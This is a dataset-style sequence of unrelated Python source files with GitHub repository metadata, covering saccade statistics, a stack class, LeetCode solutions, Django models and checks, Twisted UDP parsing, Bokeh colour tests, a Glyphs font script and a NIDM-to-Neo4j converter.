return r
@contract(x='array[N]', direction='array[N]',
x_bin_centers='array[K]', x_bin_size='>0')
def compute_direction_statistics(x, x_bin_centers, x_bin_size, direction,
alpha=0.01):
K = len(x_bin_centers)
t_prob_left = np.zeros(K)
t_prob_right = np.zeros(K)
t_margin_left = np.zeros((2, K))
t_margin_right = np.zeros((2, K))
for k in range(K):
bin_center = x_bin_centers[k]
inbin = np.logical_and(x <= bin_center + x_bin_size / 2,
bin_center - x_bin_size / 2 <= x)
dirs = direction[inbin]
num = len(dirs)
num_left = (dirs > 0).sum()
num_right = (dirs < 0).sum()
prob_left, prob_right, margin_left, margin_right = \
binomial_stats(num, num_left, num_right, alpha)
t_prob_left[k] = prob_left
t_prob_right[k] = prob_right
t_margin_left[:, k] = margin_left
t_margin_right[:, k] = margin_right
return dict(bin_centers=x_bin_centers,
prob_left=t_prob_left,
prob_right=t_prob_right,
margin_left=t_margin_left,
margin_right=t_margin_right)
def statistics_distance_axis_angle(saccades,
num_distance_intervals,
axis_angle_bin_interval,
axis_angle_bin_size
):
distance = saccades['distance_from_wall']
qs = np.linspace(0, 100, num_distance_intervals)
# distance_edges = np.linspace(0, 1, distance_intervals)
distance_edges = np.percentile(distance, qs.tolist())
distance_num_sections = len(distance_edges) - 1
distance_sections = []
for di in range(distance_num_sections):
distance_min = distance_edges[di]
distance_max = distance_edges[di + 1]
select = np.logical_and(distance > distance_min,
distance < distance_max)
relevant_saccades = saccades[select]
bin_centers = range(-180, 180 + axis_angle_bin_interval,
axis_angle_bin_interval)
statistics = compute_direction_statistics(
x=relevant_saccades['axis_angle'],
x_bin_centers=np.array(bin_centers),
x_bin_size=axis_angle_bin_size,
direction=relevant_saccades['sign'])
statistics['num_saccades'] = len(relevant_saccades)
statistics['distance_min'] = distance_min
statistics['distance_max'] = distance_max
distance_sections.append(statistics)
return dict(distance_edges=distance_edges,
distance_sections=distance_sections)
|
[
"andrea@cds.caltech.edu"
] |
andrea@cds.caltech.edu
|
5b3ad54a4efaa9fbbbe546322a45748b042140c1
|
39b84306510530e39eb9d4087977ddd6b2ee203e
|
/self_assesment/self_assesment2/numericalStack.py
|
9b89874d425cc431c8b4a307eabb5975ea52bfef
|
[
"MIT"
] |
permissive
|
sowmyamanojna/BT3051-Data-Structures-and-Algorithms
|
2ff9753a02ce1d2bdb113791d308391df19cc2f6
|
09c17e42c2e173a6ab10339f08fbc1505db8ea56
|
refs/heads/master
| 2022-12-31T02:02:23.566697
| 2020-09-12T06:59:03
| 2020-09-12T06:59:03
| 241,184,510
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 761
|
py
|
class Stack():
def __init__(self, val = []):
self._value = val
# print("Stack initialised!")
def push(self, x):
self._value.append(x)
# print ("{} is pushed into stack!!!".format(x))
return self
def pop(self):
if len(self._value) > 0:
self._value = self._value[1:]
# print ("Values popped")
else:
print ("Underflow - List is EMPTY!!!")
return self
def __len__(self):
val = 0
for i in self._value:
val += 1
return val
def is_Empty(self):
if len(self) == 0:
print ("The list is EMPTY!!!")
return True
else:
# print ("List isn't empty")
return False
def __repr__(self):
string = ""
for i in self._value:
string = string + str(i) + " "
return string
def top(self):
return self._value[0]
|
[
"sowmyamanojna@gmail.com"
] |
sowmyamanojna@gmail.com
|
9e66b3c83031a5eb2d06a77c03098a1f9a74c905
|
b332e9e5b63db27b23250ddbbb85b470ceaf92a1
|
/List/largestNumber.py
|
c4a880a23fc70378f9c187caa0e5aedc995c8561
|
[] |
no_license
|
huangketsudou/leetcode_python
|
66fcc695b0a4f94a35cc52e161ae4bfdb1138dc2
|
e983f42d245b69f9bddd9855f51ee59648a2039e
|
refs/heads/master
| 2021-08-07T23:25:45.532458
| 2020-08-23T06:15:22
| 2020-08-23T06:15:22
| 214,324,229
| 2
| 0
| null | 2020-04-12T14:40:47
| 2019-10-11T02:16:43
|
Python
|
UTF-8
|
Python
| false
| false
| 1,866
|
py
|
from typing import List
class Solution:
def largestNumber(self, cost: List[int], target: int) -> str:
dp = [[] for _ in range(target+1)]
for i in range(1, target + 1):
for j, c in enumerate(cost):
if i == c:
dp[i]=self.cmp(dp[i],[j+1]).copy()
elif i > c:
if len(dp[i - c]):
b = dp[i - c].copy()
b.append(j + 1)
dp[i] = self.cmp(dp[i], b).copy()
for i in dp:
print(i)
return ''.join(map(str,dp[-1]))
def cmp(self, a, b):
a.sort(reverse=True)
b.sort(reverse=True)
if len(a) == len(b):
return a if a > b else b
elif len(a) < len(b):
return b
else:
return a
class Solution:
#@SQRPI
def largestNumber(self, cost: List[int], tar: int) -> str:
mi = min(cost)
@lru_cache(None)
def dp(target): # target 下的最大值
if target == 0: return 0
if target < mi: return -float('inf')
res = -float('inf')
for x in range(9):
res = max(dp(target - cost[x])*10 + x + 1, res)
return res
res = dp(tar)
return str(res) if res > 0 else "0"
class Solution:
def largestNumber(self, cost: List[int], target: int) -> str:
dp = [-1 for j in range(target + 1)]
dp[0] = 0
for i in range(8, -1, -1):
for j in range(cost[i], target + 1):
if dp[j - cost[i]] < 0:
continue
dp[j] = max(dp[j], dp[j - cost[i]] * 10 + (i + 1))
if dp[target] >= 0:
return str(dp[target])
else:
return '0'
k = Solution()
print(k.largestNumber([1,1,1,1,1,1,1,1,1], 5000))
|
[
"1941161938@qq.com"
] |
1941161938@qq.com
|
432f9038e0b00672bb1870647b074519e43c0350
|
5462142b5e72cb39bea5b802dd46f55357c4ea84
|
/homework_zero_class/lesson13/多重继承-times_3.py
|
be4ae74b66504ab6fd49cf872d6296e34b224f30
|
[] |
no_license
|
qqmadeinchina/myhomeocde
|
a0996ba195020da9af32613d6d2822b049e515a0
|
291a30fac236feb75b47610c4d554392d7b30139
|
refs/heads/master
| 2023-03-23T05:28:53.076041
| 2020-08-24T08:39:00
| 2020-08-24T08:39:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,190
|
py
|
# -*- coding: utf-8 -*-
# @time :2020/8/3 14:45
# @Author:老萝卜
# @file:多重继承-times_3
# @Software:%{PRODUICT_NAME}多重继承-times_3.py
class A(object):
def test(self):
print("A......")
def test1(self):
print("A-test1......")
def test3(self):
print("A-test3......")
class B(object):
def test(self):
print("B......")
def test2(self):
print("B-test2......")
class C(B):
pass
# __bases__ 可以获取当前类所有的父类
print(C.__bases__)
print(B.__bases__)
# (<class '__main__.B'>,)
# (<class 'object'>,)
# Python中是支持多重继承的,也就是我们可以为一个类同时指定多个父类
# 可以在类名后的()中添加多个类,实现多重继承
# 多重继承,会使子类同时拥有多个父类,并且会获取到所有父类的方法
class C(A,B):
pass
print(C.__bases__)
# (<class '__main__.A'>, <class '__main__.B'>)
# 如果多个父类中有重名的方法,则会先去第一个父类中寻找,然后第二个,在然后第三个...
class C(B,A):
pass
c= C()
c.test()
c.test1()
c.test2()
c.test3()
# B......
# A-test1......
# B-test2......
# A-test3......
|
[
"newwxm@126.com"
] |
newwxm@126.com
|
82e34d60193e623a88db412888e04f745cbe0e2a
|
0e478f3d8b6c323c093455428c9094c45de13bac
|
/src/OTLMOW/OTLModel/Classes/Onderdeel/Plantbakvorm.py
|
8e481ff412fa8be69732c95c697b72f328907b15
|
[
"MIT"
] |
permissive
|
davidvlaminck/OTLMOW
|
c6eae90b2cab8a741271002cde454427ca8b75ba
|
48f8c357c475da1d2a1bc7820556843d4b37838d
|
refs/heads/main
| 2023-01-12T05:08:40.442734
| 2023-01-10T15:26:39
| 2023-01-10T15:26:39
| 432,681,113
| 3
| 1
|
MIT
| 2022-06-20T20:36:00
| 2021-11-28T10:28:24
|
Python
|
UTF-8
|
Python
| false
| false
| 4,219
|
py
|
# coding=utf-8
from OTLMOW.OTLModel.BaseClasses.OTLAttribuut import OTLAttribuut
from OTLMOW.OTLModel.Classes.Abstracten.VegetatieElement import VegetatieElement
from OTLMOW.OTLModel.Datatypes.BooleanField import BooleanField
from OTLMOW.OTLModel.Datatypes.KwantWrdInKubiekeMeter import KwantWrdInKubiekeMeter
from OTLMOW.OTLModel.Datatypes.KwantWrdInVierkanteMeter import KwantWrdInVierkanteMeter
from OTLMOW.GeometrieArtefact.VlakGeometrie import VlakGeometrie
# Generated with OTLClassCreator. To modify: extend, do not edit
class Plantbakvorm(VegetatieElement, VlakGeometrie):
"""Beplanting die niet in volle grond werd aangebracht, maar in bakvorm."""
typeURI = 'https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Plantbakvorm'
"""De URI van het object volgens https://www.w3.org/2001/XMLSchema#anyURI."""
def __init__(self):
VegetatieElement.__init__(self)
VlakGeometrie.__init__(self)
self._isBereikbaar = OTLAttribuut(field=BooleanField,
naam='isBereikbaar',
label='is bereikbaar',
objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Plantbakvorm.isBereikbaar',
definition='Duidt aan of de plantbakvorm door de mens fysiek bereikbaar is zonder hulpmiddelen.',
owner=self)
self._isVerplaatsbaar = OTLAttribuut(field=BooleanField,
naam='isVerplaatsbaar',
label='is verplaatsbaar',
objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Plantbakvorm.isVerplaatsbaar',
definition='Duidt aan of de plantbakvorm al dan niet verplaatsbaar is en dus niet permanent verankerd werd met het aardoppervlak.',
owner=self)
self._oppervlakteBak = OTLAttribuut(field=KwantWrdInVierkanteMeter,
naam='oppervlakteBak',
label='oppervlakte',
objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Plantbakvorm.oppervlakteBak',
definition='De afmetingen van de plantbak in vierkante meter.',
owner=self)
self._volume = OTLAttribuut(field=KwantWrdInKubiekeMeter,
naam='volume',
label='volume',
objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Plantbakvorm.volume',
definition='De inhoud of grootte van de plantbakvorm in de ruimte in kubieke meter.',
owner=self)
@property
def isBereikbaar(self):
"""Duidt aan of de plantbakvorm door de mens fysiek bereikbaar is zonder hulpmiddelen."""
return self._isBereikbaar.get_waarde()
@isBereikbaar.setter
def isBereikbaar(self, value):
self._isBereikbaar.set_waarde(value, owner=self)
@property
def isVerplaatsbaar(self):
"""Duidt aan of de plantbakvorm al dan niet verplaatsbaar is en dus niet permanent verankerd werd met het aardoppervlak."""
return self._isVerplaatsbaar.get_waarde()
@isVerplaatsbaar.setter
def isVerplaatsbaar(self, value):
self._isVerplaatsbaar.set_waarde(value, owner=self)
@property
def oppervlakteBak(self):
"""De afmetingen van de plantbak in vierkante meter."""
return self._oppervlakteBak.get_waarde()
@oppervlakteBak.setter
def oppervlakteBak(self, value):
self._oppervlakteBak.set_waarde(value, owner=self)
@property
def volume(self):
"""De inhoud of grootte van de plantbakvorm in de ruimte in kubieke meter."""
return self._volume.get_waarde()
@volume.setter
def volume(self, value):
self._volume.set_waarde(value, owner=self)
|
[
"david.vlaminck@mow.vlaanderen.be"
] |
david.vlaminck@mow.vlaanderen.be
|
59b4c9db05c27c7724251e295febdd0179db742e
|
24fbe6b25338a58701a70fdda1aa81ef3add5fd3
|
/blog/migrations/0001_initial.py
|
a10a14be7a20c47db9e2eb1cb1f37151cd0ad50d
|
[] |
no_license
|
jattoabdul/jatto-portfolio
|
1d9001c90423114402119119baf325a287ad0c30
|
1e2d883f7da3c6f654a0796ec22750b52653e1c1
|
refs/heads/master
| 2021-01-13T07:19:52.932401
| 2016-10-21T07:46:28
| 2016-10-21T07:46:28
| 71,542,572
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,240
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-18 09:53
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Categories',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(db_index=True, max_length=50, unique=True)),
('slug', models.SlugField(unique=True)),
],
options={
'ordering': ['name'],
'verbose_name_plural': 'Categories',
},
),
migrations.CreateModel(
name='Posts',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=150, unique=True, verbose_name='Post Title')),
('slug', models.SlugField(max_length=150, unique=True, verbose_name='URL')),
('date', models.DateField(auto_now=True)),
('time', models.TimeField(auto_now=True)),
('posted', models.DateTimeField(auto_now_add=True, db_index=True)),
('meta_description', models.CharField(blank=True, max_length=500, verbose_name='Meta Description')),
('meta_keywords', models.CharField(blank=True, max_length=250, verbose_name='Meta Keywords')),
('body', models.TextField()),
('published', models.BooleanField(default=None)),
('author', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.Categories')),
],
options={
'ordering': ['-date'],
'verbose_name_plural': 'Posts',
},
),
]
|
[
"jattoade@gmail.com"
] |
jattoade@gmail.com
|
45ce2c771a4665fdafa68a6b528d542323ae5b78
|
bdf86d69efc1c5b21950c316ddd078ad8a2f2ec0
|
/venv/Lib/site-packages/twisted/pair/rawudp.py
|
4a582b4475c57f6cd30f9db14c9c2a4319325960
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
DuaNoDo/PythonProject
|
543e153553c58e7174031b910fd6451399afcc81
|
2c5c8aa89dda4dec2ff4ca7171189788bf8b5f2c
|
refs/heads/master
| 2020-05-07T22:22:29.878944
| 2019-06-14T07:44:35
| 2019-06-14T07:44:35
| 180,941,166
| 1
| 1
| null | 2019-06-04T06:27:29
| 2019-04-12T06:05:42
|
Python
|
UTF-8
|
Python
| false
| false
| 1,814
|
py
|
# -*- test-case-name: twisted.pair.test.test_rawudp -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Implementation of raw packet interfaces for UDP
"""
import struct
from twisted.internet import protocol
from twisted.pair import raw
from zope.interface import implementer
class UDPHeader:
def __init__(self, data):
(self.source, self.dest, self.len, self.check) \
= struct.unpack("!HHHH", data[:8])
@implementer(raw.IRawDatagramProtocol)
class RawUDPProtocol(protocol.AbstractDatagramProtocol):
def __init__(self):
self.udpProtos = {}
def addProto(self, num, proto):
if not isinstance(proto, protocol.DatagramProtocol):
raise TypeError('Added protocol must be an instance of DatagramProtocol')
if num < 0:
raise TypeError('Added protocol must be positive or zero')
if num >= 2**16:
raise TypeError('Added protocol must fit in 16 bits')
if num not in self.udpProtos:
self.udpProtos[num] = []
self.udpProtos[num].append(proto)
def datagramReceived(self,
data,
partial,
source,
dest,
protocol,
version,
ihl,
tos,
tot_len,
fragment_id,
fragment_offset,
dont_fragment,
more_fragments,
ttl):
header = UDPHeader(data)
for proto in self.udpProtos.get(header.dest, ()):
proto.datagramReceived(data[8:],
(source, header.source))
|
[
"teadone@naver.com"
] |
teadone@naver.com
|
1a89de4b58df39f71a8cdaded521bd9bcc57ad82
|
ac1fdf53359b53e183fb9b2602328595b07cf427
|
/ParlAI/parlai/agents/transformer/ranker.py
|
51cefc77cb2f438fcd95c2cf84c00a8116b011bd
|
[] |
no_license
|
Ufukdogann/MasterThesis
|
780410c5df85b789136b525bce86ba0831409233
|
b09ede1e3c88c4ac3047800f5187c671eeda18be
|
refs/heads/main
| 2023-01-24T18:09:52.285718
| 2020-11-27T16:14:29
| 2020-11-27T16:14:29
| 312,416,173
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:f95aa8138972542126c3bcb4a212d2bf9ef9cda22d8b31711b727a63c523e699
size 335
|
[
"134679852Ufuk*"
] |
134679852Ufuk*
|
f7b744cfd5605b2aaf4cfa03f7cb316c383583ae
|
ed1e81a2325d310de7961274a06bfe6cdb7993d0
|
/basic-python/2.py
|
99f2e56af41d4bda165783ada2d9ac971743ca69
|
[] |
no_license
|
fahimkhan/python
|
ce573298adf30ca8426b74f3ab275ab7f8047a91
|
1733ad39cf214362c8a76f8996740715888d2101
|
refs/heads/master
| 2021-01-15T15:50:27.323739
| 2016-08-24T11:02:56
| 2016-08-24T11:02:56
| 20,254,607
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 407
|
py
|
#! /usr/bin/python
balance = int(raw_input('Enter balance'))
annualInterestRate = .2
payment = 0
TempBalance = balance
while TempBalance > 0:
payment += 10
TempBalance = balance
for month in range (1,13):
TempBalance = (TempBalance - payment) * (1+(annualInterestRate/12))
print(TempBalance)
if TempBalance <= 0:
print str('Lowest Payment: ' + str(round(payment,2)))
break
|
[
"fahim.elex@gmail.com"
] |
fahim.elex@gmail.com
|
bb32a4488d76e23dcf13ae34a46596167e8f81c9
|
57ea54e829f2fc8fcbea29fa8e2c9a6f64d88c3b
|
/promgen/checks.py
|
881c7e4f3d32d43f2118326d8a09357b6c6a6968
|
[
"MIT",
"BSD-3-Clause"
] |
permissive
|
k8stech/promgen
|
4c959003f44be6c9bd207b81f440c090a5c2f47b
|
d189d27d37016b1861e3a0e4fb6186e5008bbcd9
|
refs/heads/master
| 2022-04-14T11:58:16.221164
| 2020-04-10T01:15:59
| 2020-04-10T01:15:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,697
|
py
|
import os
import pathlib
from django.conf import settings
from django.core import checks
from promgen import models, util
@checks.register(checks.Tags.models)
def sites(app_configs, **kwargs):
if models.Site.objects.count() == 0:
yield checks.Error(
"Site not configured", hint="Missing django site configuration"
)
for site in models.Site.objects.filter(
pk=settings.SITE_ID, domain__in=["example.com"]
):
yield checks.Error(
"Site not configured", obj=site, hint="Please update from admin panel"
)
@checks.register(checks.Tags.models)
def shards(**kwargs):
if models.Shard.objects.filter(enabled=True).count() == 0:
yield checks.Warning("Missing shards", hint="Ensure some shards are enabled")
if models.Shard.objects.filter(proxy=True).count() == 0:
yield checks.Warning("No proxy shards", hint="Ensure some shards are enabled")
@checks.register("settings")
def directories(**kwargs):
for key in ["prometheus:rules", "prometheus:blackbox", "prometheus:targets"]:
try:
path = pathlib.Path(util.setting(key)).parent
except TypeError:
yield checks.Warning("Missing setting for " + key)
else:
if not os.access(path, os.W_OK):
yield checks.Warning("Unable to write to %s" % path)
@checks.register("settings")
def promtool(**kwargs):
try:
path = pathlib.Path(util.setting("prometheus:promtool"))
except TypeError:
yield checks.Warning("Missing setting for " + key)
else:
if not os.access(path, os.X_OK):
yield checks.Warning("Unable to execute file %s" % path)
|
[
"paul.traylor@linecorp.com"
] |
paul.traylor@linecorp.com
|
c958cb5a82f6c8104bc7e0444032862e11459094
|
6b63f4fc5105f3190014e1dd5685a891a74f8c63
|
/0050_desafio.py
|
5be9a03b2c845818497d762946f24cd25bcae2ca
|
[] |
no_license
|
matheuszei/Python_DesafiosCursoemvideo
|
a711c7c9c6db022cc8a16a3a1dc59afabb586105
|
5b216908dd0845ba25ee6d2e6f8b3e9419c074d2
|
refs/heads/main
| 2023-05-10T18:13:09.785651
| 2021-06-04T13:50:48
| 2021-06-04T13:50:48
| 370,851,791
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 323
|
py
|
#Desenvolva um programa que leia seis números inteiros e mostre a soma apenas daqueles
# que forem pares. Se o valor digitado for ímpar, desconsidere-o.
soma = 0
for c in range(0, 6):
n = int(input('({}) Digite um valor: '.format(c)))
if n % 2 == 0:
soma += n
print('Soma total: {}'.format(soma))
|
[
"noreply@github.com"
] |
matheuszei.noreply@github.com
|
8d92e4c3a4b1b88ae82f1dff436289a50a3edeaa
|
83d657c787529f01a8ecc8a874421738a7eecec7
|
/Components/Decompose Corner and Cap Components.py
|
1dd679598592878764a5f6a5b69a03429fbcd0da
|
[
"Apache-2.0"
] |
permissive
|
BurgAndOeden/Glyphs-Scripts
|
e31b5164b491dfe0cd2d57f6cf1422c4aadda104
|
f0195d6b8f0a6c055e4e44d5ef41ba48bdd1e3a6
|
refs/heads/master
| 2020-09-16T08:01:06.345898
| 2019-11-24T00:15:44
| 2019-11-24T00:15:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,498
|
py
|
#MenuTitle: Decompose Corner and Cap Components
# -*- coding: utf-8 -*-
__doc__="""
Recreates the current paths without caps or components.
"""
from Foundation import NSClassFromString
thisFont = Glyphs.font # frontmost font
selectedLayers = thisFont.selectedLayers # active layers of selected glyphs
removeOverlapFilter = NSClassFromString("GlyphsFilterRemoveOverlap").alloc().init()
gridSize = float(thisFont.gridMain())/thisFont.gridSubDivision()
def removeCorners(thisLayer):
numOfHints = len(thisLayer.hints)
for i in range(numOfHints)[::-1]:
if thisLayer.hints[i].type == 16: # corner
thisLayer.removeObjectFromHintsAtIndex_(i)
def removeCaps(thisLayer):
numOfHints = len(thisLayer.hints)
for i in range(numOfHints)[::-1]:
if thisLayer.hints[i].type == 17: # cap
thisLayer.removeObjectFromHintsAtIndex_(i)
def process( thisLayer ):
pen = GSBezStringPen.alloc().init()
for thisPath in thisLayer.paths:
thisPath.drawInPen_(pen)
pathString = pen.charString()
newPaths = removeOverlapFilter.pathsFromBez_gridSize_(pathString,gridSize)
removeCaps(thisLayer)
removeCorners(thisLayer)
thisLayer.paths = newPaths
thisFont.disableUpdateInterface() # suppresses UI updates in Font View
for thisLayer in selectedLayers:
thisGlyph = thisLayer.parent
print "Processing", thisGlyph.name
thisGlyph.beginUndo() # begin undo grouping
process( thisLayer )
thisGlyph.endUndo() # end undo grouping
thisFont.enableUpdateInterface() # re-enables UI updates in Font View
|
[
"res@glyphsapp.com"
] |
res@glyphsapp.com
|
1d6318d6da52ddd15efa39e18f8a38efab9c2016
|
2729fff7cb053d2577985d38c8962043ee9f853d
|
/bokeh/colors/tests/test_rgb.py
|
38a92fcdc5718cea5c5cb924d3373c70544bb3a2
|
[
"BSD-3-Clause"
] |
permissive
|
modster/bokeh
|
2c78c5051fa9cac48c8c2ae7345eafc54b426fbd
|
60fce9003aaa618751c9b8a3133c95688073ea0b
|
refs/heads/master
| 2020-03-29T01:13:35.740491
| 2018-09-18T06:08:59
| 2018-09-18T06:08:59
| 149,377,781
| 1
| 0
|
BSD-3-Clause
| 2018-09-19T02:02:49
| 2018-09-19T02:02:49
| null |
UTF-8
|
Python
| false
| false
| 4,379
|
py
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2017, Anaconda, Inc. All rights reserved.
#
# Powered by the Bokeh Development Team.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function, unicode_literals
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
# External imports
# Bokeh imports
from bokeh.colors import HSL
# Module under test
import bokeh.colors.rgb as bcr
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
class Test_RGB(object):
def test_init(self):
c = bcr.RGB(10, 20, 30)
assert c
assert c.a == 1.0
assert c.r == 10
assert c.g == 20
assert c.b == 30
c = bcr.RGB(10, 20, 30, 0.3)
assert c
assert c.a == 0.3
assert c.r == 10
assert c.g == 20
assert c.b == 30
def test_repr(self):
c = bcr.RGB(10, 20, 30)
assert repr(c) == c.to_css()
c = bcr.RGB(10, 20, 30, 0.3)
assert repr(c) == c.to_css()
def test_copy(self):
c = bcr.RGB(10, 0.2, 0.3)
c2 = c.copy()
assert c2 is not c
assert c2.a == c.a
assert c2.r == c.r
assert c2.g == c.g
assert c2.b == c.b
def test_from_hsl(self):
c = HSL(10, 0.1, 0.2)
c2 = bcr.RGB.from_hsl(c)
assert c2 is not c
assert c2.a == 1.0
assert c2.r == 56
assert c2.g == 48
assert c2.b == 46
c = HSL(10, 0.1, 0.2, 0.3)
c2 = bcr.RGB.from_hsl(c)
assert c2 is not c
assert c2.a == 0.3
assert c2.r == 56
assert c2.g == 48
assert c2.b == 46
def test_from_rgb(self):
c = bcr.RGB(10, 20, 30)
c2 = bcr.RGB.from_rgb(c)
assert c2 is not c
assert c2.a == c.a
assert c2.r == c.r
assert c2.g == c.g
assert c2.b == c.b
c = bcr.RGB(10, 20, 30, 0.1)
c2 = bcr.RGB.from_rgb(c)
assert c2 is not c
assert c2.a == c.a
assert c2.r == c.r
assert c2.g == c.g
assert c2.b == c.b
def test_to_css(self):
c = bcr.RGB(10, 20, 30)
assert c.to_css() == "rgb(10, 20, 30)"
c = bcr.RGB(10, 20, 30, 0.3)
assert c.to_css() == "rgba(10, 20, 30, 0.3)"
def test_to_hex(self):
c = bcr.RGB(10, 20, 30)
assert c.to_hex(), "#%02X%02X%02X" % (c.r, c.g, c.b)
def test_to_hsl(self):
c = bcr.RGB(255, 100, 0)
c2 = c.to_hsl()
assert c2 is not c
assert c2.a == c.a
assert c2.h == 24
assert c2.s == 1.0
assert c2.l == 0.5
c = bcr.RGB(255, 100, 0, 0.1)
c2 = c.to_hsl()
assert c2 is not c
assert c2.a == c.a
assert c2.h == 24
assert c2.s == 1.0
assert c2.l == 0.5
def test_to_rgb(self):
c = bcr.RGB(10, 20, 30)
c2 = c.to_rgb()
assert c2 is not c
assert c2.a == c.a
assert c2.r == c.r
assert c2.g == c.g
assert c2.b == c.b
c = bcr.RGB(10, 20, 30, 0.1)
c2 = c.to_rgb()
assert c2 is not c
assert c2.a == c.a
assert c2.r == c.r
assert c2.g == c.g
assert c2.b == c.b
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
|
[
"noreply@github.com"
] |
modster.noreply@github.com
|
aa247b139b389b58a5500dc4c769591494b5cef3
|
ac5e52a3fc52dde58d208746cddabef2e378119e
|
/exps-sblp-obt/sblp_ut=3.5_rd=0.5_rw=0.04_rn=4_u=0.075-0.325_p=harmonic-2/sched=RUN_trial=35/sched.py
|
a0392c19ab7309ecc424144631532e7acfb8ce71
|
[] |
no_license
|
ricardobtxr/experiment-scripts
|
1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1
|
7bcebff7ac2f2822423f211f1162cd017a18babb
|
refs/heads/master
| 2023-04-09T02:37:41.466794
| 2021-04-25T03:27:16
| 2021-04-25T03:27:16
| 358,926,457
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 493
|
py
|
-S 2 -X RUN -Q 0 -L 1 73 250
-S 2 -X RUN -Q 0 -L 1 47 150
-S 2 -X RUN -Q 0 -L 1 39 150
-S 1 -X RUN -Q 1 -L 1 36 200
-S 1 -X RUN -Q 1 -L 1 34 150
-S 1 -X RUN -Q 1 -L 1 34 125
-S 0 -X RUN -Q 2 -L 1 32 200
-S 0 -X RUN -Q 2 -L 1 29 400
-S 0 -X RUN -Q 2 -L 1 28 125
-S 3 -X RUN -Q 3 -L 1 27 150
-S 3 -X RUN -Q 3 -L 1 27 250
-S 4 27 200
-S 5 25 300
-S 4 25 175
-S 4 21 150
-S 4 21 125
-S 4 17 125
-S 4 15 125
-S 4 13 125
-S 5 10 100
-S 5 10 125
|
[
"ricardo.btxr@gmail.com"
] |
ricardo.btxr@gmail.com
|
833502e31a08a9076d125cf4da8732dc6e9093f4
|
4a3b651b892121b149406b0c11ded96dfbbbc309
|
/nidm_neo4j.py
|
50a797ccba84c66d1bd7196a27fa18d7c7e1d151
|
[] |
no_license
|
vsoch/nidm-neo4j
|
78c10f7540b4462997e57075fe55466fec2322f6
|
00c4a077e416ced19b6d3d246ac959e9a8ffb004
|
refs/heads/master
| 2021-01-10T01:36:01.665912
| 2015-10-15T20:17:46
| 2015-10-15T20:17:46
| 44,143,178
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,416
|
py
|
from nidmviewer.convert import get_lookups, get_nidm_keys, get_field_groups
from nidmviewer.convert import getjson
from rdflib.serializer import Serializer
from rdflib import Graph as graphrdf, plugin
import rdfextras
rdfextras.registerplugins()
plugin.register(
'json-ld',
Serializer,
'rdflib_jsonld.serializer',
'JsonLDSerializer')
import numpy
import json
import re
import os
import sys
ttl_file = sys.argv[1]
outfolder = sys.argv[2]
username = sys.argv[3]
repo_name = sys.argv[4]
if not os.path.exists(outfolder):
os.mkdir(outfolder)
ttl = getjson(ttl_file)
# create a node
def create_node(nid,node_type,uid,name,properties):
node_type = node_type.lower().replace(" ","").replace("'","").replace("-","")
name = name.replace("'","").replace("-","")
if len(properties) > 0:
property_string = ""
for p in range(len(properties)):
property_name = properties[p][0].lower().replace(" ","").replace("'","").replace("-","")
property_value = properties[p][1]
property_string = "%s %s : '%s'," %(property_string,property_name,property_value)
property_string = property_string[:-1]
return "create (_%s:%s { id : '%s', name :'%s', %s})\n" %(nid,node_type,uid,name,property_string)
else:
return "create (_%s:%s { id : '%s', name :'%s'})\n" %(nid,node_type,uid,name)
# create a relationship
def create_relation(nid1,nid2,relationship):
relationship = relationship.upper().replace("'","").replace("-","")
return "create _%s-[:`%s`]->_%s\n" %(nid1,relationship,nid2)
fields,lookup = get_lookups(ttl)
groups = get_field_groups(ttl)
manual_fields = get_nidm_keys()
for name,uri in manual_fields.iteritems():
if uri not in lookup:
lookup[uri] = name
# First we will save data structures to look up node ids based on URI
nodes = dict()
count = 1
for result in ttl:
rgroup = [x for x in result["@type"] if x in groups][0]
rtype = [x for x in result["@type"] if x != rgroup]
if len(rtype)>0:
rtype = rtype[0]
if rtype in lookup.keys():
result_id = result["@id"].encode("utf-8")
if result_id not in nodes:
nodes[result_id] = count
count +=1
# Define ids of relationships
labeluri = "http://www.w3.org/2000/01/rdf-schema#label"
